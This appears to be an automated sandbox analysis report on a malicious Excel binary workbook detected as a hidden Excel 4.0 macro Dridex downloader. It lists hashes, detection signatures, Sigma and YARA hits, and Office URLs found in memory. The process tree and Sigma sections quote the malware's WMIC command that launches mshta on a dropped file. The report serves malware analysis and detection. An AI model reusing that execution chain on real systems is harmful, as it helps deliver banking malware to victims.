Windows Analysis Report 4310352755503838173672.xlsb

Overview

General Information

Sample Name: 4310352755503838173672.xlsb
Analysis ID: 532553
MD5: 88a363b14590b0c0aab8d954ac3e1b5c
SHA1: af7b370945a8bcec0a979c93ef83770073f2b08a
SHA256: 1004873035711456c20f311b16484154554d13e060dd2bbb2c0c2ddd4e73ced4

Detection

Hidden Macro 4.0 Dridex Downloader
Score: 96
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Yara detected Dridex Downloader
Multi AV Scanner detection for submitted file
Creates and opens a fake document (probably a fake document to hide exploiting)
Found Excel 4.0 Macro with suspicious formulas
Sigma detected: Microsoft Office Product Spawning Windows Shell
Document exploit detected (process start blacklist hit)
Creates processes via WMI
Found protected and hidden Excel 4.0 Macro sheet
Contains functionality to create processes via WMI
Found obfuscated Excel 4.0 Macro
Found a hidden Excel 4.0 Macro sheet
Searches for the Microsoft Outlook file path
Yara detected Xls With Macro 4.0
Sigma detected: Suspicious WMI Execution
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)

Process Tree

  • System is w10x64
  • EXCEL.EXE (PID: 6980 cmdline: "C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE" /automation -Embedding MD5: 5D6638F2C8F8571C593999C58866007E)
    • WMIC.exe (PID: 2588 cmdline: wmic process call create "mshta C:\ProgramData\lvDMlIDBF.rtf" MD5: 79A01FCD1C8166C5642F37D1E0FB7BA8)
      • conhost.exe (PID: 128 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • mshta.exe (PID: 5244 cmdline: mshta C:\ProgramData\lvDMlIDBF.rtf MD5: 197FC97C6A843BEBB445C1D9C58DCBDB)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

Source | Rule | Description | Author | Strings
app.xml | JoeSecurity_XlsWithMacro4 | Yara detected Xls With Macro 4.0 | Joe Security |

    Dropped Files

    Source | Rule | Description | Author | Strings
    C:\ProgramData\lvDMlIDBF.rtf | JoeSecurity_DridexDownloader | Yara detected Dridex Downloader | Joe Security |

      Sigma Overview

      System Summary:

      Sigma detected: Microsoft Office Product Spawning Windows Shell
      Source: Process started; Author: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team; Data: Command: wmic process call create "mshta C:\ProgramData\lvDMlIDBF.rtf", CommandLine: wmic process call create "mshta C:\ProgramData\lvDMlIDBF.rtf", CommandLine|base64offset|contains: h, Image: C:\Windows\SysWOW64\wbem\WMIC.exe, NewProcessName: C:\Windows\SysWOW64\wbem\WMIC.exe, OriginalFileName: C:\Windows\SysWOW64\wbem\WMIC.exe, ParentCommandLine: "C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE, ParentProcessId: 6980, ProcessCommandLine: wmic process call create "mshta C:\ProgramData\lvDMlIDBF.rtf", ProcessId: 2588
      Sigma detected: Suspicious WMI Execution
      Source: Process started; Author: Michael Haag, Florian Roth, juju4, oscd.community; Data: Command: wmic process call create "mshta C:\ProgramData\lvDMlIDBF.rtf", CommandLine: wmic process call create "mshta C:\ProgramData\lvDMlIDBF.rtf", CommandLine|base64offset|contains: h, Image: C:\Windows\SysWOW64\wbem\WMIC.exe, NewProcessName: C:\Windows\SysWOW64\wbem\WMIC.exe, OriginalFileName: C:\Windows\SysWOW64\wbem\WMIC.exe, ParentCommandLine: "C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE, ParentProcessId: 6980, ProcessCommandLine: wmic process call create "mshta C:\ProgramData\lvDMlIDBF.rtf", ProcessId: 2588

      Jbx Signature Overview

      AV Detection:

      Multi AV Scanner detection for submitted file
      Source: 4310352755503838173672.xlsb, Virustotal: Detection: 39%
      Source: 4310352755503838173672.xlsb, ReversingLabs: Detection: 21%
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE, File opened: C:\Windows\SysWOW64\MSVCR100.dll

      Software Vulnerabilities:

      Document exploit detected (process start blacklist hit)
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE, Process created: C:\Windows\SysWOW64\wbem\WMIC.exe
      Source: EXCEL.EXE, 00000000.00000003.652755350.000000000E141000.00000004.00000001.sdmp, AACFAEF8-C3FD-4180-B292-8D7DA5E94EC1.0.drString found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
      Source: EXCEL.EXE, 00000000.00000003.652989909.000000000F73B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.935840425.000000000F729000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.742471357.000000000F729000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.773711564.000000000F729000.00000004.00000001.sdmpString found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml=3
      Source: AACFAEF8-C3FD-4180-B292-8D7DA5E94EC1.0.drString found in binary or memory: https://cdn.entity.
      Source: EXCEL.EXE, 00000000.00000002.934621206.000000000E20D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652755350.000000000E141000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.654254896.000000000E20D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.661747538.000000000E20D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.660265666.000000000E20D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652940500.000000000E20D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.655880436.000000000E20D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652838684.000000000E20D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.851830559.000000000E20D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.778410177.000000000E20D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.742911449.000000000E20D000.00000004.00000001.sdmp, AACFAEF8-C3FD-4180-B292-8D7DA5E94EC1.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
      Source: EXCEL.EXE, 00000000.00000003.652755350.000000000E141000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.937910955.0000000015530000.00000004.00000001.sdmp, AACFAEF8-C3FD-4180-B292-8D7DA5E94EC1.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
      Source: EXCEL.EXE, 00000000.00000003.652798917.000000000E19D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652985368.000000000E1C0000.00000004.00000001.sdmpString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsellSkyDriveSignUpUpsellImageht
      Source: EXCEL.EXE, 00000000.00000003.652755350.000000000E141000.00000004.00000001.sdmp, AACFAEF8-C3FD-4180-B292-8D7DA5E94EC1.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
      Source: EXCEL.EXE, 00000000.00000002.937910955.0000000015530000.00000004.00000001.sdmpString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell/c
      Source: EXCEL.EXE, 00000000.00000003.652798917.000000000E19D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652985368.000000000E1C0000.00000004.00000001.sdmpString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsellLiveProfileServicehttps
      Source: EXCEL.EXE, 00000000.00000003.652755350.000000000E141000.00000004.00000001.sdmp, AACFAEF8-C3FD-4180-B292-8D7DA5E94EC1.0.drString found in binary or memory: https://client-office365-tas.msedge.net/ab
      Source: EXCEL.EXE, 00000000.00000003.661389448.000000000E392000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.935100289.000000000E3A0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.742268683.000000000E392000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.653934403.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.654323256.000000000E3AF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.660196369.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.655655152.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.743138102.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652660540.000000000E3B3000.00000004.00000001.sdmpString found in binary or memory: https://client-office365-tas.msedge.net/abc
      Source: AACFAEF8-C3FD-4180-B292-8D7DA5E94EC1.0.drString found in binary or memory: https://clients.config.office.net/
      Source: EXCEL.EXE, 00000000.00000003.652985368.000000000E1C0000.00000004.00000001.sdmpString found in binary or memory: https://clients.config.office.net/Bearer
      Source: EXCEL.EXE, 00000000.00000003.652985368.000000000E1C0000.00000004.00000001.sdmpString found in binary or memory: https://clients.config.office.net/https://login.windows.net/common/oauth2/authorize
      Source: EXCEL.EXE, 00000000.00000003.661389448.000000000E392000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.935100289.000000000E3A0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.742268683.000000000E392000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.653934403.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.654323256.000000000E3AF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.660196369.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.655655152.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.743138102.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652660540.000000000E3B3000.00000004.00000001.sdmpString found in binary or memory: https://clients.config.office.net/l
      Source: AACFAEF8-C3FD-4180-B292-8D7DA5E94EC1.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
      Source: EXCEL.EXE, 00000000.00000003.652798917.000000000E19D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652985368.000000000E1C0000.00000004.00000001.sdmpString found in binary or memory: https://clients.config.office.net/user/v1.0/android/policiesBearer
      Source: EXCEL.EXE, 00000000.00000003.652798917.000000000E19D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652985368.000000000E1C0000.00000004.00000001.sdmpString found in binary or memory: https://clients.config.office.net/user/v1.0/android/policieshttps://login.windows.net/common/oauth2/
      Source: EXCEL.EXE, 00000000.00000002.937910955.0000000015530000.00000004.00000001.sdmpString found in binary or memory: https://clients.config.office.net/user/v1.0/android/policiestf&
      Source: AACFAEF8-C3FD-4180-B292-8D7DA5E94EC1.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/ios
      Source: EXCEL.EXE, 00000000.00000003.652798917.000000000E19D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652985368.000000000E1C0000.00000004.00000001.sdmpString found in binary or memory: https://clients.config.office.net/user/v1.0/iosBearer
      Source: EXCEL.EXE, 00000000.00000003.661389448.000000000E392000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.935100289.000000000E3A0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.742268683.000000000E392000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.653934403.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.654323256.000000000E3AF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.660196369.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.655655152.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.743138102.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652660540.000000000E3B3000.00000004.00000001.sdmpString found in binary or memory: https://clients.config.office.net/user/v1.0/iosI
      Source: EXCEL.EXE, 00000000.00000003.652798917.000000000E19D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652985368.000000000E1C0000.00000004.00000001.sdmpString found in binary or memory: https://clients.config.office.net/user/v1.0/ioshttps://login.windows.net/common/oauth2/authorize
      Source: AACFAEF8-C3FD-4180-B292-8D7DA5E94EC1.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/mac
      Source: EXCEL.EXE, 00000000.00000003.652798917.000000000E19D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652985368.000000000E1C0000.00000004.00000001.sdmpString found in binary or memory: https://clients.config.office.net/user/v1.0/macBearer
      Source: EXCEL.EXE, 00000000.00000003.652798917.000000000E19D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652985368.000000000E1C0000.00000004.00000001.sdmpString found in binary or memory: https://clients.config.office.net/user/v1.0/machttps://login.windows.net/common/oauth2/authorize
      Source: EXCEL.EXE, 00000000.00000003.661389448.000000000E392000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.935100289.000000000E3A0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.742268683.000000000E392000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.653934403.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.654323256.000000000E3AF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.660196369.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.655655152.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.743138102.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652660540.000000000E3B3000.00000004.00000001.sdmpString found in binary or memory: https://clients.config.office.net/user/v1.0/maco
      Source: AACFAEF8-C3FD-4180-B292-8D7DA5E94EC1.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
      Source: EXCEL.EXE, 00000000.00000003.652798917.000000000E19D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652985368.000000000E1C0000.00000004.00000001.sdmpString found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkeyBearer
      Source: EXCEL.EXE, 00000000.00000003.652798917.000000000E19D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652985368.000000000E1C0000.00000004.00000001.sdmpString found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkeyhttps://login.windows.net/common/oau
      Source: EXCEL.EXE, 00000000.00000003.661389448.000000000E392000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.935100289.000000000E3A0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.742268683.000000000E392000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.653934403.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.654323256.000000000E3AF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.660196369.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.655655152.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.743138102.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652660540.000000000E3B3000.00000004.00000001.sdmpString found in binary or memory: https://clients.config.office.net/y
      Source: EXCEL.EXE, 00000000.00000003.652755350.000000000E141000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.937910955.0000000015530000.00000004.00000001.sdmp, AACFAEF8-C3FD-4180-B292-8D7DA5E94EC1.0.drString found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
      Source: EXCEL.EXE, 00000000.00000003.652673103.000000000E384000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652641725.000000000E377000.00000004.00000001.sdmpString found in binary or memory: https://cloudfiles.onenote.com/upload.aspxOneNoteCloudFilesConsumerEmbedhttps://onedrive.live.com/em
      Source: EXCEL.EXE, 00000000.00000003.652755350.000000000E141000.00000004.00000001.sdmp, AACFAEF8-C3FD-4180-B292-8D7DA5E94EC1.0.drString found in binary or memory: https://config.edge.skype.com
      Source: EXCEL.EXE, 00000000.00000003.652755350.000000000E141000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.661389448.000000000E392000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.935100289.000000000E3A0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.742268683.000000000E392000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.653934403.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.654323256.000000000E3AF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.660196369.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.655655152.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.743138102.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652660540.000000000E3B3000.00000004.00000001.sdmp, AACFAEF8-C3FD-4180-B292-8D7DA5E94EC1.0.drString found in binary or memory: https://config.edge.skype.com/config/v1/Office
      Source: EXCEL.EXE, 00000000.00000003.652755350.000000000E141000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.661389448.000000000E392000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.935100289.000000000E3A0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.742268683.000000000E392000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.653934403.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.654323256.000000000E3AF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.660196369.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.655655152.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.743138102.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652660540.000000000E3B3000.00000004.00000001.sdmp, AACFAEF8-C3FD-4180-B292-8D7DA5E94EC1.0.drString found in binary or memory: https://config.edge.skype.com/config/v2/Office
      Source: EXCEL.EXE, 00000000.00000003.661389448.000000000E392000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.935100289.000000000E3A0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.742268683.000000000E392000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.653934403.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.654323256.000000000E3AF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.660196369.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.655655152.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.743138102.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652660540.000000000E3B3000.00000004.00000001.sdmpString found in binary or memory: https://config.edge.skype.comV
      Source: AACFAEF8-C3FD-4180-B292-8D7DA5E94EC1.0.drString found in binary or memory: https://cortana.ai
      Source: AACFAEF8-C3FD-4180-B292-8D7DA5E94EC1.0.drString found in binary or memory: https://cortana.ai/api
      Source: EXCEL.EXE, 00000000.00000003.652906974.000000000E377000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652641725.000000000E377000.00000004.00000001.sdmpString found in binary or memory: https://cortana.ai/apiBearer
      Source: EXCEL.EXE, 00000000.00000002.937910955.0000000015530000.00000004.00000001.sdmpString found in binary or memory: https://cortana.ai/apigs
      Source: EXCEL.EXE, 00000000.00000003.652906974.000000000E377000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652641725.000000000E377000.00000004.00000001.sdmpString found in binary or memory: https://cortana.ai/apihttps://login.windows.net/common/oauth2/authorize
      Source: EXCEL.EXE, 00000000.00000002.937910955.0000000015530000.00000004.00000001.sdmpString found in binary or memory: https://cortana.aietl
      Source: EXCEL.EXE, 00000000.00000003.652755350.000000000E141000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.937910955.0000000015530000.00000004.00000001.sdmp, AACFAEF8-C3FD-4180-B292-8D7DA5E94EC1.0.drString found in binary or memory: https://cr.office.com
      Source: AACFAEF8-C3FD-4180-B292-8D7DA5E94EC1.0.drString found in binary or memory: https://dataservice.o365filtering.com
      Source: AACFAEF8-C3FD-4180-B292-8D7DA5E94EC1.0.drString found in binary or memory: https://dataservice.o365filtering.com/
      Source: EXCEL.EXE, 00000000.00000003.652755350.000000000E141000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.937910955.0000000015530000.00000004.00000001.sdmp, AACFAEF8-C3FD-4180-B292-8D7DA5E94EC1.0.drString found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
      Source: EXCEL.EXE, 00000000.00000003.652906974.000000000E377000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652641725.000000000E377000.00000004.00000001.sdmpString found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFileBearer
      Source: EXCEL.EXE, 00000000.00000003.652673103.000000000E384000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652641725.000000000E377000.00000004.00000001.sdmpString found in binary or memory: https://dataservice.o365filtering.com/https://login.windows.net/common/oauth2/authorize
      Source: EXCEL.EXE, 00000000.00000003.661389448.000000000E392000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.935100289.000000000E3A0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.742268683.000000000E392000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.653934403.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.654323256.000000000E3AF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.660196369.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.655655152.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.743138102.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652660540.000000000E3B3000.00000004.00000001.sdmpString found in binary or memory: https://dataservice.o365filtering.comHa
      Source: EXCEL.EXE, 00000000.00000002.937910955.0000000015530000.00000004.00000001.sdmpString found in binary or memory: https://dataservice.o365filtering.comm
      Source: EXCEL.EXE, 00000000.00000002.937910955.0000000015530000.00000004.00000001.sdmpString found in binary or memory: https://dataservice.o365filtering.coms
      Source: EXCEL.EXE, 00000000.00000003.661389448.000000000E392000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.935100289.000000000E3A0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.742268683.000000000E392000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.653934403.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.654323256.000000000E3AF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.660196369.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.655655152.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.743138102.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652660540.000000000E3B3000.00000004.00000001.sdmpString found in binary or memory: https://dataservice.o365filtering.comvd
      Source: EXCEL.EXE, 00000000.00000003.652755350.000000000E141000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.937910955.0000000015530000.00000004.00000001.sdmp, AACFAEF8-C3FD-4180-B292-8D7DA5E94EC1.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
      Source: EXCEL.EXE, 00000000.00000003.652906974.000000000E377000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652641725.000000000E377000.00000004.00000001.sdmpString found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFileBearer
      Source: EXCEL.EXE, 00000000.00000003.742853289.000000000E1D2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.660247505.000000000E1D2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652755350.000000000E141000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.654236313.000000000E1DC000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652925426.000000000E1DC000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934591120.000000000E1D2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.778384283.000000000E1D2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.661726514.000000000E1D2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.852724407.000000000E1D2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652824432.000000000E1DC000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.655830251.000000000E1DC000.00000004.00000001.sdmp, AACFAEF8-C3FD-4180-B292-8D7DA5E94EC1.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
      Source: EXCEL.EXE, 00000000.00000003.652673103.000000000E384000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652641725.000000000E377000.00000004.00000001.sdmpString found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPoliciesBearer
      Source: AACFAEF8-C3FD-4180-B292-8D7DA5E94EC1.0.drString found in binary or memory: https://dev.cortana.ai
      Source: EXCEL.EXE, 00000000.00000003.652906974.000000000E377000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652641725.000000000E377000.00000004.00000001.sdmpString found in binary or memory: https://dev.cortana.aiBearer
      Source: EXCEL.EXE, 00000000.00000003.652906974.000000000E377000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652641725.000000000E377000.00000004.00000001.sdmpString found in binary or memory: https://dev.cortana.aihttps://login.windows.net/common/oauth2/authorize
      Source: EXCEL.EXE, 00000000.00000003.652755350.000000000E141000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.937910955.0000000015530000.00000004.00000001.sdmp, AACFAEF8-C3FD-4180-B292-8D7DA5E94EC1.0.drString found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
      Source: EXCEL.EXE, 00000000.00000003.652755350.000000000E141000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.661389448.000000000E392000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.935100289.000000000E3A0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.742268683.000000000E392000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.653934403.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.654323256.000000000E3AF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.660196369.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.655655152.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.743138102.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652660540.000000000E3B3000.00000004.00000001.sdmp, AACFAEF8-C3FD-4180-B292-8D7DA5E94EC1.0.drString found in binary or memory: https://dev0-api.acompli.net/autodetect
      Source: EXCEL.EXE, 00000000.00000003.652755350.000000000E141000.00000004.00000001.sdmp, AACFAEF8-C3FD-4180-B292-8D7DA5E94EC1.0.drString found in binary or memory: https://devnull.onenote.com
      Source: EXCEL.EXE, 00000000.00000003.661389448.000000000E392000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.935100289.000000000E3A0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.742268683.000000000E392000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.653934403.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.654323256.000000000E3AF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.660196369.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.655655152.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.743138102.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652660540.000000000E3B3000.00000004.00000001.sdmpString found in binary or memory: https://devnull.onenote.com0
      Source: EXCEL.EXE, 00000000.00000003.652673103.000000000E384000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652641725.000000000E377000.00000004.00000001.sdmpString found in binary or memory: https://devnull.onenote.comBearer
      Source: EXCEL.EXE, 00000000.00000003.652673103.000000000E384000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652641725.000000000E377000.00000004.00000001.sdmpString found in binary or memory: https://devnull.onenote.comMBI_SSL_SHORT
